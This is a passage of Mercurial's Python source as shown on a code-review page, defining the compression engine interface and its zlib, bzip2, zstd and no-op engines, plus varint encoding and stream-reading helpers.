        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

# The global compression engine registry; engines defined below (and by
# extensions) register themselves against this instance.
compengines = compressormanager()
3439
3443
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.

    Subclasses override the identity methods (``name``, ``bundletype``,
    ``wireprotosupport``, ``revlogheader``) to declare where the engine may
    be used, and the worker methods (``compressstream``,
    ``decompressorreader``, ``revlogcompressor``) to do the actual work.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        # Default: always available; optional engines override this.
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3556
3560
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        # Level -1 lets zlib pick its default compression level.
        level = (opts or {}).get('level', -1)
        z = zlib.compressobj(level)
        for chunk in it:
            compressed = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if compressed:
                yield compressed
        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Inputs this small never compress past zlib's own overhead.
            if insize < 44:
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                # Only worthwhile when the result is actually smaller.
                return compressed if len(compressed) < insize else None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            z = zlib.compressobj()
            parts = []
            pos = 0
            while pos < insize:
                end = pos + 2**20
                parts.append(z.compress(data[pos:end]))
                pos = end
            parts.append(z.flush())

            if sum(map(len, parts)) < insize:
                return ''.join(parts)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3643
3647
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        level = (opts or {}).get('level', 9)
        compressor = bz2.BZ2Compressor(level)
        for chunk in it:
            out = compressor.compress(chunk)
            # compress() may buffer input without emitting output;
            # don't push empty chunks through the generator.
            if out:
                yield out
        yield compressor.flush()

    def decompressorreader(self, fh):
        def gen():
            decompressor = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield decompressor.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3686
3690
3687 class _truncatedbz2engine(compressionengine):
3691 class _truncatedbz2engine(compressionengine):
3688 def name(self):
3692 def name(self):
3689 return 'bz2truncated'
3693 return 'bz2truncated'
3690
3694
3691 def bundletype(self):
3695 def bundletype(self):
3692 return None, '_truncatedBZ'
3696 return None, '_truncatedBZ'
3693
3697
3694 # We don't implement compressstream because it is hackily handled elsewhere.
3698 # We don't implement compressstream because it is hackily handled elsewhere.
3695
3699
3696 def decompressorreader(self, fh):
3700 def decompressorreader(self, fh):
3697 def gen():
3701 def gen():
3698 # The input stream doesn't have the 'BZ' header. So add it back.
3702 # The input stream doesn't have the 'BZ' header. So add it back.
3699 d = bz2.BZ2Decompressor()
3703 d = bz2.BZ2Decompressor()
3700 d.decompress('BZ')
3704 d.decompress('BZ')
3701 for chunk in filechunkiter(fh):
3705 for chunk in filechunkiter(fh):
3702 yield d.decompress(chunk)
3706 yield d.decompress(chunk)
3703
3707
3704 return chunkbuffer(gen())
3708 return chunkbuffer(gen())
3705
3709
3706 compengines.register(_truncatedbz2engine())
3710 compengines.register(_truncatedbz2engine())
3707
3711
3708 class _noopengine(compressionengine):
3712 class _noopengine(compressionengine):
3709 def name(self):
3713 def name(self):
3710 return 'none'
3714 return 'none'
3711
3715
3712 def bundletype(self):
3716 def bundletype(self):
3713 """No compression is performed.
3717 """No compression is performed.
3714
3718
3715 Use this compression engine to explicitly disable compression.
3719 Use this compression engine to explicitly disable compression.
3716 """
3720 """
3717 return 'none', 'UN'
3721 return 'none', 'UN'
3718
3722
3719 # Clients always support uncompressed payloads. Servers don't because
3723 # Clients always support uncompressed payloads. Servers don't because
3720 # unless you are on a fast network, uncompressed payloads can easily
3724 # unless you are on a fast network, uncompressed payloads can easily
3721 # saturate your network pipe.
3725 # saturate your network pipe.
3722 def wireprotosupport(self):
3726 def wireprotosupport(self):
3723 return compewireprotosupport('none', 0, 10)
3727 return compewireprotosupport('none', 0, 10)
3724
3728
3725 # We don't implement revlogheader because it is handled specially
3729 # We don't implement revlogheader because it is handled specially
3726 # in the revlog class.
3730 # in the revlog class.
3727
3731
3728 def compressstream(self, it, opts=None):
3732 def compressstream(self, it, opts=None):
3729 return it
3733 return it
3730
3734
3731 def decompressorreader(self, fh):
3735 def decompressorreader(self, fh):
3732 return fh
3736 return fh
3733
3737
3734 class nooprevlogcompressor(object):
3738 class nooprevlogcompressor(object):
3735 def compress(self, data):
3739 def compress(self, data):
3736 return None
3740 return None
3737
3741
3738 def revlogcompressor(self, opts=None):
3742 def revlogcompressor(self, opts=None):
3739 return self.nooprevlogcompressor()
3743 return self.nooprevlogcompressor()
3740
3744
3741 compengines.register(_noopengine())
3745 compengines.register(_noopengine())
3742
3746
3743 class _zstdengine(compressionengine):
3747 class _zstdengine(compressionengine):
3744 def name(self):
3748 def name(self):
3745 return 'zstd'
3749 return 'zstd'
3746
3750
3747 @propertycache
3751 @propertycache
3748 def _module(self):
3752 def _module(self):
3749 # Not all installs have the zstd module available. So defer importing
3753 # Not all installs have the zstd module available. So defer importing
3750 # until first access.
3754 # until first access.
3751 try:
3755 try:
3752 from . import zstd
3756 from . import zstd
3753 # Force delayed import.
3757 # Force delayed import.
3754 zstd.__version__
3758 zstd.__version__
3755 return zstd
3759 return zstd
3756 except ImportError:
3760 except ImportError:
3757 return None
3761 return None
3758
3762
3759 def available(self):
3763 def available(self):
3760 return bool(self._module)
3764 return bool(self._module)
3761
3765
3762 def bundletype(self):
3766 def bundletype(self):
3763 """A modern compression algorithm that is fast and highly flexible.
3767 """A modern compression algorithm that is fast and highly flexible.
3764
3768
3765 Only supported by Mercurial 4.1 and newer clients.
3769 Only supported by Mercurial 4.1 and newer clients.
3766
3770
3767 With the default settings, zstd compression is both faster and yields
3771 With the default settings, zstd compression is both faster and yields
3768 better compression than ``gzip``. It also frequently yields better
3772 better compression than ``gzip``. It also frequently yields better
3769 compression than ``bzip2`` while operating at much higher speeds.
3773 compression than ``bzip2`` while operating at much higher speeds.
3770
3774
3771 If this engine is available and backwards compatibility is not a
3775 If this engine is available and backwards compatibility is not a
3772 concern, it is likely the best available engine.
3776 concern, it is likely the best available engine.
3773 """
3777 """
3774 return 'zstd', 'ZS'
3778 return 'zstd', 'ZS'
3775
3779
3776 def wireprotosupport(self):
3780 def wireprotosupport(self):
3777 return compewireprotosupport('zstd', 50, 50)
3781 return compewireprotosupport('zstd', 50, 50)
3778
3782
3779 def revlogheader(self):
3783 def revlogheader(self):
3780 return '\x28'
3784 return '\x28'
3781
3785
3782 def compressstream(self, it, opts=None):
3786 def compressstream(self, it, opts=None):
3783 opts = opts or {}
3787 opts = opts or {}
3784 # zstd level 3 is almost always significantly faster than zlib
3788 # zstd level 3 is almost always significantly faster than zlib
3785 # while providing no worse compression. It strikes a good balance
3789 # while providing no worse compression. It strikes a good balance
3786 # between speed and compression.
3790 # between speed and compression.
3787 level = opts.get('level', 3)
3791 level = opts.get('level', 3)
3788
3792
3789 zstd = self._module
3793 zstd = self._module
3790 z = zstd.ZstdCompressor(level=level).compressobj()
3794 z = zstd.ZstdCompressor(level=level).compressobj()
3791 for chunk in it:
3795 for chunk in it:
3792 data = z.compress(chunk)
3796 data = z.compress(chunk)
3793 if data:
3797 if data:
3794 yield data
3798 yield data
3795
3799
3796 yield z.flush()
3800 yield z.flush()
3797
3801
3798 def decompressorreader(self, fh):
3802 def decompressorreader(self, fh):
3799 zstd = self._module
3803 zstd = self._module
3800 dctx = zstd.ZstdDecompressor()
3804 dctx = zstd.ZstdDecompressor()
3801 return chunkbuffer(dctx.read_from(fh))
3805 return chunkbuffer(dctx.read_from(fh))
3802
3806
3803 class zstdrevlogcompressor(object):
3807 class zstdrevlogcompressor(object):
3804 def __init__(self, zstd, level=3):
3808 def __init__(self, zstd, level=3):
3805 # Writing the content size adds a few bytes to the output. However,
3809 # Writing the content size adds a few bytes to the output. However,
3806 # it allows decompression to be more optimal since we can
3810 # it allows decompression to be more optimal since we can
3807 # pre-allocate a buffer to hold the result.
3811 # pre-allocate a buffer to hold the result.
3808 self._cctx = zstd.ZstdCompressor(level=level,
3812 self._cctx = zstd.ZstdCompressor(level=level,
3809 write_content_size=True)
3813 write_content_size=True)
3810 self._dctx = zstd.ZstdDecompressor()
3814 self._dctx = zstd.ZstdDecompressor()
3811 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3815 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3812 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3816 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3813
3817
3814 def compress(self, data):
3818 def compress(self, data):
3815 insize = len(data)
3819 insize = len(data)
3816 # Caller handles empty input case.
3820 # Caller handles empty input case.
3817 assert insize > 0
3821 assert insize > 0
3818
3822
3819 if insize < 50:
3823 if insize < 50:
3820 return None
3824 return None
3821
3825
3822 elif insize <= 1000000:
3826 elif insize <= 1000000:
3823 compressed = self._cctx.compress(data)
3827 compressed = self._cctx.compress(data)
3824 if len(compressed) < insize:
3828 if len(compressed) < insize:
3825 return compressed
3829 return compressed
3826 return None
3830 return None
3827 else:
3831 else:
3828 z = self._cctx.compressobj()
3832 z = self._cctx.compressobj()
3829 chunks = []
3833 chunks = []
3830 pos = 0
3834 pos = 0
3831 while pos < insize:
3835 while pos < insize:
3832 pos2 = pos + self._compinsize
3836 pos2 = pos + self._compinsize
3833 chunk = z.compress(data[pos:pos2])
3837 chunk = z.compress(data[pos:pos2])
3834 if chunk:
3838 if chunk:
3835 chunks.append(chunk)
3839 chunks.append(chunk)
3836 pos = pos2
3840 pos = pos2
3837 chunks.append(z.flush())
3841 chunks.append(z.flush())
3838
3842
3839 if sum(map(len, chunks)) < insize:
3843 if sum(map(len, chunks)) < insize:
3840 return ''.join(chunks)
3844 return ''.join(chunks)
3841 return None
3845 return None
3842
3846
3843 def decompress(self, data):
3847 def decompress(self, data):
3844 insize = len(data)
3848 insize = len(data)
3845
3849
3846 try:
3850 try:
3847 # This was measured to be faster than other streaming
3851 # This was measured to be faster than other streaming
3848 # decompressors.
3852 # decompressors.
3849 dobj = self._dctx.decompressobj()
3853 dobj = self._dctx.decompressobj()
3850 chunks = []
3854 chunks = []
3851 pos = 0
3855 pos = 0
3852 while pos < insize:
3856 while pos < insize:
3853 pos2 = pos + self._decompinsize
3857 pos2 = pos + self._decompinsize
3854 chunk = dobj.decompress(data[pos:pos2])
3858 chunk = dobj.decompress(data[pos:pos2])
3855 if chunk:
3859 if chunk:
3856 chunks.append(chunk)
3860 chunks.append(chunk)
3857 pos = pos2
3861 pos = pos2
3858 # Frame should be exhausted, so no finish() API.
3862 # Frame should be exhausted, so no finish() API.
3859
3863
3860 return ''.join(chunks)
3864 return ''.join(chunks)
3861 except Exception as e:
3865 except Exception as e:
3862 raise error.RevlogError(_('revlog decompress error: %s') %
3866 raise error.RevlogError(_('revlog decompress error: %s') %
3863 forcebytestr(e))
3867 forcebytestr(e))
3864
3868
3865 def revlogcompressor(self, opts=None):
3869 def revlogcompressor(self, opts=None):
3866 opts = opts or {}
3870 opts = opts or {}
3867 return self.zstdrevlogcompressor(self._module,
3871 return self.zstdrevlogcompressor(self._module,
3868 level=opts.get('level', 3))
3872 level=opts.get('level', 3))
3869
3873
3870 compengines.register(_zstdengine())
3874 compengines.register(_zstdengine())
3871
3875
3872 def bundlecompressiontopics():
3876 def bundlecompressiontopics():
3873 """Obtains a list of available bundle compressions for use in help."""
3877 """Obtains a list of available bundle compressions for use in help."""
3874 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3878 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3875 items = {}
3879 items = {}
3876
3880
3877 # We need to format the docstring. So use a dummy object/type to hold it
3881 # We need to format the docstring. So use a dummy object/type to hold it
3878 # rather than mutating the original.
3882 # rather than mutating the original.
3879 class docobject(object):
3883 class docobject(object):
3880 pass
3884 pass
3881
3885
3882 for name in compengines:
3886 for name in compengines:
3883 engine = compengines[name]
3887 engine = compengines[name]
3884
3888
3885 if not engine.available():
3889 if not engine.available():
3886 continue
3890 continue
3887
3891
3888 bt = engine.bundletype()
3892 bt = engine.bundletype()
3889 if not bt or not bt[0]:
3893 if not bt or not bt[0]:
3890 continue
3894 continue
3891
3895
3892 doc = pycompat.sysstr('``%s``\n %s') % (
3896 doc = pycompat.sysstr('``%s``\n %s') % (
3893 bt[0], engine.bundletype.__doc__)
3897 bt[0], engine.bundletype.__doc__)
3894
3898
3895 value = docobject()
3899 value = docobject()
3896 value.__doc__ = doc
3900 value.__doc__ = doc
3897 value._origdoc = engine.bundletype.__doc__
3901 value._origdoc = engine.bundletype.__doc__
3898 value._origfunc = engine.bundletype
3902 value._origfunc = engine.bundletype
3899
3903
3900 items[bt[0]] = value
3904 items[bt[0]] = value
3901
3905
3902 return items
3906 return items
3903
3907
3904 i18nfunctions = bundlecompressiontopics().values()
3908 i18nfunctions = bundlecompressiontopics().values()
3905
3909
3906 # convenient shortcut
3910 # convenient shortcut
3907 dst = debugstacktrace
3911 dst = debugstacktrace
3908
3912
3909 def safename(f, tag, ctx, others=None):
3913 def safename(f, tag, ctx, others=None):
3910 """
3914 """
3911 Generate a name that it is safe to rename f to in the given context.
3915 Generate a name that it is safe to rename f to in the given context.
3912
3916
3913 f: filename to rename
3917 f: filename to rename
3914 tag: a string tag that will be included in the new name
3918 tag: a string tag that will be included in the new name
3915 ctx: a context, in which the new name must not exist
3919 ctx: a context, in which the new name must not exist
3916 others: a set of other filenames that the new name must not be in
3920 others: a set of other filenames that the new name must not be in
3917
3921
3918 Returns a file name of the form oldname~tag[~number] which does not exist
3922 Returns a file name of the form oldname~tag[~number] which does not exist
3919 in the provided context and is not in the set of other names.
3923 in the provided context and is not in the set of other names.
3920 """
3924 """
3921 if others is None:
3925 if others is None:
3922 others = set()
3926 others = set()
3923
3927
3924 fn = '%s~%s' % (f, tag)
3928 fn = '%s~%s' % (f, tag)
3925 if fn not in ctx and fn not in others:
3929 if fn not in ctx and fn not in others:
3926 return fn
3930 return fn
3927 for n in itertools.count(1):
3931 for n in itertools.count(1):
3928 fn = '%s~%s~%s' % (f, tag, n)
3932 fn = '%s~%s~%s' % (f, tag, n)
3929 if fn not in ctx and fn not in others:
3933 if fn not in ctx and fn not in others:
3930 return fn
3934 return fn
3931
3935
3932 def readexactly(stream, n):
3936 def readexactly(stream, n):
3933 '''read n bytes from stream.read and abort if less was available'''
3937 '''read n bytes from stream.read and abort if less was available'''
3934 s = stream.read(n)
3938 s = stream.read(n)
3935 if len(s) < n:
3939 if len(s) < n:
3936 raise error.Abort(_("stream ended unexpectedly"
3940 raise error.Abort(_("stream ended unexpectedly"
3937 " (got %d bytes, expected %d)")
3941 " (got %d bytes, expected %d)")
3938 % (len(s), n))
3942 % (len(s), n))
3939 return s
3943 return s
3940
3944
3941 def uvarintencode(value):
3945 def uvarintencode(value):
3942 """Encode an unsigned integer value to a varint.
3946 """Encode an unsigned integer value to a varint.
3943
3947
3944 A varint is a variable length integer of 1 or more bytes. Each byte
3948 A varint is a variable length integer of 1 or more bytes. Each byte
3945 except the last has the most significant bit set. The lower 7 bits of
3949 except the last has the most significant bit set. The lower 7 bits of
3946 each byte store the 2's complement representation, least significant group
3950 each byte store the 2's complement representation, least significant group
3947 first.
3951 first.
3948
3952
3949 >>> uvarintencode(0)
3953 >>> uvarintencode(0)
3950 '\\x00'
3954 '\\x00'
3951 >>> uvarintencode(1)
3955 >>> uvarintencode(1)
3952 '\\x01'
3956 '\\x01'
3953 >>> uvarintencode(127)
3957 >>> uvarintencode(127)
3954 '\\x7f'
3958 '\\x7f'
3955 >>> uvarintencode(1337)
3959 >>> uvarintencode(1337)
3956 '\\xb9\\n'
3960 '\\xb9\\n'
3957 >>> uvarintencode(65536)
3961 >>> uvarintencode(65536)
3958 '\\x80\\x80\\x04'
3962 '\\x80\\x80\\x04'
3959 >>> uvarintencode(-1)
3963 >>> uvarintencode(-1)
3960 Traceback (most recent call last):
3964 Traceback (most recent call last):
3961 ...
3965 ...
3962 ProgrammingError: negative value for uvarint: -1
3966 ProgrammingError: negative value for uvarint: -1
3963 """
3967 """
3964 if value < 0:
3968 if value < 0:
3965 raise error.ProgrammingError('negative value for uvarint: %d'
3969 raise error.ProgrammingError('negative value for uvarint: %d'
3966 % value)
3970 % value)
3967 bits = value & 0x7f
3971 bits = value & 0x7f
3968 value >>= 7
3972 value >>= 7
3969 bytes = []
3973 bytes = []
3970 while value:
3974 while value:
3971 bytes.append(pycompat.bytechr(0x80 | bits))
3975 bytes.append(pycompat.bytechr(0x80 | bits))
3972 bits = value & 0x7f
3976 bits = value & 0x7f
3973 value >>= 7
3977 value >>= 7
3974 bytes.append(pycompat.bytechr(bits))
3978 bytes.append(pycompat.bytechr(bits))
3975
3979
3976 return ''.join(bytes)
3980 return ''.join(bytes)
3977
3981
3978 def uvarintdecodestream(fh):
3982 def uvarintdecodestream(fh):
3979 """Decode an unsigned variable length integer from a stream.
3983 """Decode an unsigned variable length integer from a stream.
3980
3984
3981 The passed argument is anything that has a ``.read(N)`` method.
3985 The passed argument is anything that has a ``.read(N)`` method.
3982
3986
3983 >>> try:
3987 >>> try:
3984 ... from StringIO import StringIO as BytesIO
3988 ... from StringIO import StringIO as BytesIO
3985 ... except ImportError:
3989 ... except ImportError:
3986 ... from io import BytesIO
3990 ... from io import BytesIO
3987 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3991 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3988 0
3992 0
3989 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3993 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3990 1
3994 1
3991 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3995 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3992 127
3996 127
3993 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3997 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3994 1337
3998 1337
3995 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3999 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3996 65536
4000 65536
3997 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4001 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3998 Traceback (most recent call last):
4002 Traceback (most recent call last):
3999 ...
4003 ...
4000 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4004 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4001 """
4005 """
4002 result = 0
4006 result = 0
4003 shift = 0
4007 shift = 0
4004 while True:
4008 while True:
4005 byte = ord(readexactly(fh, 1))
4009 byte = ord(readexactly(fh, 1))
4006 result |= ((byte & 0x7f) << shift)
4010 result |= ((byte & 0x7f) << shift)
4007 if not (byte & 0x80):
4011 if not (byte & 0x80):
4008 return result
4012 return result
4009 shift += 7
4013 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now